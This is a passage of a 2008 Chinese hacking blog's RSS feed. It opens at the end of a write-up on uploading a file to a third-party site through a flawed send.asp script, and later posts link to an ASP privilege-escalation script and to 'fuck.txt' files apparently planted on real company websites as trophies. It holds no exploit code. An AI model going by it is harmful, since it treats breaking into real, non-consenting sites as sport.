<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg" border="0"><br>
<br>
&nbsp;&nbsp;<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg" border="0"> <br>
<br>
提交后我们打开<a href="http://www.3hack.com/xia/test.txt" target="_blank"><font color="#2b76b0">www.3hack.com/xia/test.txt</font></a>看看，如图7所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg" border="0"> <br>
<br>
这下终于可以装到X了，如果不是V时代的作者写的send.asp代码存在问题，拿到shell是不难的<br>
<br>
如果jian是经过request取值的话，同样也能搞到shell。<br>
<br>
这次只是装到了X，并没有拿到shell<br>
<br>
已经是凌晨了，跟云中J说了声就睡觉去鸟<br>
<br>
估计那B可能搞到了权限，不过我没问他，最近事情比较多，也比较忙<br>
<br>
就到这里吧，没技术含量，纯粹装X，高手们见笑了<br>
<br>
另外劝告某些认为上传个JPG就能黑到站的大黑客，你这样自欺欺人吃亏的是你自己<br>
<br>
自己学不到技术，却还在自欺欺人<br>
<br>
不说了，本文到这里，最后感谢一下阿拉伯黑客，原来阿拉伯黑客也是很强大的，好了，猪大家愉快~~</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/59ee26c60e1c1a1d9d163d98.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-10  00:44</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/59ee26c60e1c1a1d9d163d98.html</guid>
</item>

<item>
        <title><![CDATA[遨游...mxup]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/dccf66d3a8d378063af3cf97.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/xh%5Fhook/pic/item/c347a21f29c9f479f624e4b9.jpg"></div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/dccf66d3a8d378063af3cf97.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-07  03:47</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/dccf66d3a8d378063af3cf97.html</guid>
</item>

<item>
        <title><![CDATA[专家称过度依赖搜索引擎导致思维惰性]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/a958752dad9fe232349bf7da.html]]></link>
        <description><![CDATA[
		
		<p>来源：广州日报</p>
<p> </p>
<p style="text-indent: 2em">今年9月，刚年满&ldquo;10岁&rdquo;的Google已经拥有全球最强大的计算机<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>，其搜索引擎存储着超过400亿互联网网页。Google一词早已作为搜索引擎的代名词，融入了网民的日常生活，当近一半的英国人患上了&ldquo;Google依赖症&rdquo;时，中国也有过半数网民陷入&ldquo;搜索依赖&rdquo;的漩涡。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">对此，专家提醒，这是<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>时代的一个全球化现象，无限的搜索引擎让人类有限的大脑实现任意衔接。而需要正视的是，搜索成瘾所带来的思考惰性，让越来越多的网民思维趋于简单化。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em"><strong>场达人的&ldquo;三不境界&rdquo;</strong></p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">一年前，中搜总裁兼CEO、被称为中国搜索引擎第一人的陈沛在其《搜商：人类的第三种能力》一书时，第一次提出&ldquo;搜商&rdquo;的概念，并把它称为人类除&ldquo;智商&rdquo;、&ldquo;情商&rdquo;之外的第三种能力。&ldquo;互联网搜索引擎不仅能帮我们搜索到想要的信息，还能帮助我们寻找秩序感，巧妙使用搜索引擎，能够减低或者消除我们对信息的焦虑感。&rdquo;</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">在接受本报记者的采访时，陈沛还提出了自己特有的&ldquo;搜索实用论&rdquo;：在这个信息爆炸的年代，没必要对信息逐一浏览，至于记忆就更没有必要，信息是为我们所用而非驾驭我们的；其次，信息纷繁复杂、千头万绪，不要期望面面俱到，只查跟你工作或者需求有关的信息即可，并对信息加以整合，同时合理使用时间挑一些主流媒体查查即可。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">一群&ldquo;史上最牛的职场达人&rdquo;宣称自己达到了&ldquo;三不境界&rdquo;：不记忆任何资料、不思考任何问题、不撰写任何文案。这都是因为Google、<a class="channel_keylink" href="http://www.3800hk.com/">百度</a>等搜索引擎的强大功能，已经在不知不觉中让很多上班族染上了&ldquo;搜索依赖症&rdquo;。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">在中国互联<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>信息中心发布的中国搜索引擎市场调查报告中显示，44.71%的网民经常使用(每天多次使用)搜索引擎，可见近半数网民经常使用搜索引擎。此外，每天使用一次搜索引擎的用户也占到了17.2%，这意味着每日使用搜索引擎用户数高达61.9%。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em"><strong>80后年轻人症状更严重</strong></p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">中国台湾作家简大为自称长期患有&ldquo;Google检索上瘾症&rdquo;。在接受记者采访中，不仅对自己检索&ldquo;上瘾&rdquo;的症状毫不隐瞒，还直言不讳认为：这种&ldquo;瘾&rdquo;是一种有助于每日累积知识的&ldquo;瘾&rdquo;。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">&ldquo;由于互联网的出现，许多过往必须到图书馆、书店或特定资料中心才能查到的资料，现在有很大比例都可以在<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>上&lsquo;<a class="channel_keylink" href="http://www.3800hk.com/">免费</a>&rsquo;取得。这么好用又珍贵的资源，如果不去使用它们，实在太可惜。&rdquo;</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">简大为工作上经常需要接触欧美或日本的管理刊物或科技刊物，因而在这七八年间累积了大量的使用Google查询或查证资料的经验。后来变成一有小疑问，就马上打开计算机找Google搜寻，逐渐&ldquo;成瘾&rdquo;。&ldquo;我每一天的学习、生活、娱乐，都离不开搜索。但我这是让它为我的工作和学习<a class="channel_keylink" href="http://www.3800hk.com/">服务</a>，我并没有因此丧失思考和质疑的能力。&rdquo;</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">更多在<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>时代成长起来的80后年轻人，则将搜索使用发挥到极致，24岁的媒体从业者方志涛就概括道：&ldquo;这年头，还有谁上网不用搜索的吗？从早上一睁眼开始，去哪儿吃早饭，坐哪路车，文案怎么写，下班放学之后去哪K歌，明星们的八卦，最新的新闻事件更新，哪里有购物打折，身体不舒服是咋回事，甚至你忽然想知道某个久违的朋友的近况，都可以立刻上网搜索一下。&rdquo;</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em"><strong>过度依赖搜索<a class="channel_keylink" href="http://www.3800hk.com/">百度</a>谷歌 小心大脑变&ldquo;抽水马桶&rdquo;</strong></p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">著名心理学家张怡筠博士通过观察发现，由于对搜索引擎的过分依赖，让太多网民不再费力去记忆，不再绞尽脑汁思考问题，不再为一个观点而争论，&ldquo;不记、不想、不争&rdquo;，已经是许多都市白领最普遍的互联网行为。&ldquo;以前人们觉得自己的大脑应该是知识的蓄水库，然而现在年轻人的大脑却像抽水马桶一样，一切知识来也匆匆，去也匆匆，丧失了基本的积累。&rdquo;</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">过去的两年中，在批阅自己带的硕士研究生作业中，张博士时常发现，学生交的作业从内容到观点都大同小异，&ldquo;过后才发现，那是因为他们都使用同一个搜索引擎。&rdquo;张博士有些无奈地摇头道，同时也非常担心方便的搜索引擎让这些年轻人不思考不记忆，失去了创造力。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">张博士提醒，把&ldquo;搜索&rdquo;当作解决问题的唯一模式是可怕的，当遇到问题求助于搜索引擎时，网友们提供答案并不需要负责任，往往会出现一些不健康的内容，这对于鉴别能力不强的人甚至会产生误导。&ldquo;知识若不花力气去擒获，搜索来的知识，虽然丰富，但如果不加记忆、组合、创新，它就不真正属于你，所谓万事俱备的搜索引擎里的&ldquo;标准答案&rdquo;也不免辞典、教科书的僵化，甚至会出现以讹传讹的转载。你能随时随地带着电脑出行么？面试时遇到考官的刁难，你难道要转身去google后再答？</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em"><strong>搜索成为安全感来源</strong></p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">张怡筠发现，许多人之所以迷恋上<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>搜索，是因为他们怕在朋友的谈论中有太多事情自己不知道，&ldquo;置身于与人交流中，对他们提及的内容一旦不知晓，他们就会坐立不安，又由于交流障碍无法直接与人交流获得答案，于是只好沉浸在对海量信息无法掌握的焦虑之中。&rdquo;因此，人们习惯从<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>搜索中获取一切生活中需要的信息，甚至变成自身安全感的一种来源，有些人的症状比较严重，对<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>搜索的依赖导致他们丧失的沟通能力。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">&ldquo;其实，我们不用每个问题都要懂，在朋友的交谈中，学会提问，也能在人际交往中赢得主动。&rdquo;</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">张博士欣赏许多欧洲人的生活习惯：无论走到哪里，很少随身携带电脑，而是随身携带一本书，因为看书的同时会促进你的记忆和思考，但如果依赖<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>，依赖搜索，则让你感觉那些知识就是在那里，你需要的时候再去搜就可以了。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em"><strong>专家支招摆脱搜索依赖症 自我提醒慢慢戒</strong></p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">针对不少迷恋搜索的白领朋友，张博士建议：首先，不要给自己太高的要求，如果已经有了搜索成瘾，分步骤慢慢戒，不如先要求自己双周日不接触电脑。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">其次，每一次看电脑时都有意识提醒自己，问自己，做这些事情是不是必要的，给自己设定十分钟搜索时间，如果持续太久，不如干脆喝个茶，上个洗手间，呼吸呼吸新鲜空气，转移一下对电脑的注意力。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">然后，经常让自己跟自己的大脑做辩论：&ldquo;我真的有必要了解这些东西吗？&rdquo;&ldquo;这些信息对我很重要吗？&rdquo;如果上网的时候被网页上的大标题所吸引，要及时制止自己的好奇心。</p>
<p style="text-indent: 2em"> </p>
<p style="text-indent: 2em">最后，要不断地提醒自己，每天只有24个小时，不能沉溺在<a class="channel_keylink" href="http://www.3800hk.com/">网络</a>搜索和链接中，因为怎样合理利用自己的时间决定着你有什么样的人生。</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/a958752dad9fe232349bf7da.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-05  04:27</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/a958752dad9fe232349bf7da.html</guid>
</item>

<item>
        <title><![CDATA[all by myself]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/1842fd4bce03ccf682025c7c.html]]></link>
        <description><![CDATA[
		
		<a href="http://user.qzone.qq.com/82602935/blog/1222716596">http://user.qzone.qq.com/82602935/blog/1222716596</a> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/1842fd4bce03ccf682025c7c.html#comment">查看评论</a>]]></description>
        <pubDate>2008-09-30  03:33</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/1842fd4bce03ccf682025c7c.html</guid>
</item>

<item>
        <title><![CDATA[今天]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/4e45bbf865c6ef09d9f9fdf7.html]]></link>
        <description><![CDATA[
		
		今天天气很好...<img src="http://img.baidu.com/hi/tsj/t_0037.gif"> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/4e45bbf865c6ef09d9f9fdf7.html#comment">查看评论</a>]]></description>
        <pubDate>2008-09-29  21:35</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/4e45bbf865c6ef09d9f9fdf7.html</guid>
</item>

<item>
        <title><![CDATA[国庆礼物——su提权通杀asp脚本]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/ac395cd731e12cdba144dfaf.html]]></link>
        <description><![CDATA[
		
		<a href="http://00day.cn/forum/read.php?tid=566">http://00day.cn/forum/read.php?tid=566</a> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/ac395cd731e12cdba144dfaf.html#comment">查看评论</a>]]></description>
        <pubDate>2008-09-28  19:04</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/ac395cd731e12cdba144dfaf.html</guid>
</item>

<item>
        <title><![CDATA[旭老板路过了微点]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/b1f1a73680bdc3370a55a9e3.html]]></link>
        <description><![CDATA[
		
		micropoint<br>
d9090707706c5123b23d84980dec3f06 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/b1f1a73680bdc3370a55a9e3.html#comment">查看评论</a>]]></description>
        <pubDate>2008-09-28  07:17</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/b1f1a73680bdc3370a55a9e3.html</guid>
</item>

<item>
        <title><![CDATA[路过金帝巧克力]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/bb0f5cf3afb6c1cd0a46e0e1.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/xh%5Fhook/pic/item/ac395cd7abdcb6c7a044df7f.jpg"></p>
<p><a href="http://www.leconte.com.cn/fuck.txt">http://www.leconte.com.cn/fuck.txt</a></p>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/bb0f5cf3afb6c1cd0a46e0e1.html#comment">查看评论</a>]]></description>
        <pubDate>2008-09-28  06:53</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/bb0f5cf3afb6c1cd0a46e0e1.html</guid>
</item>

<item>
        <title><![CDATA[路过小熊饼干]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/1d0665fafcbec18f9e51461f.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/xh%5Fhook/pic/item/5e2a84078741c7d77b8947b3.jpg"></p>
<p><a href="http://www.lottechina.com.cn/fuck.txt">http://www.lottechina.com.cn/fuck.txt</a></p>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/1d0665fafcbec18f9e51461f.html#comment">查看评论</a>]]></description>
        <pubDate>2008-09-28  03:40</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/1d0665fafcbec18f9e51461f.html</guid>
</item>


</channel>
</rss>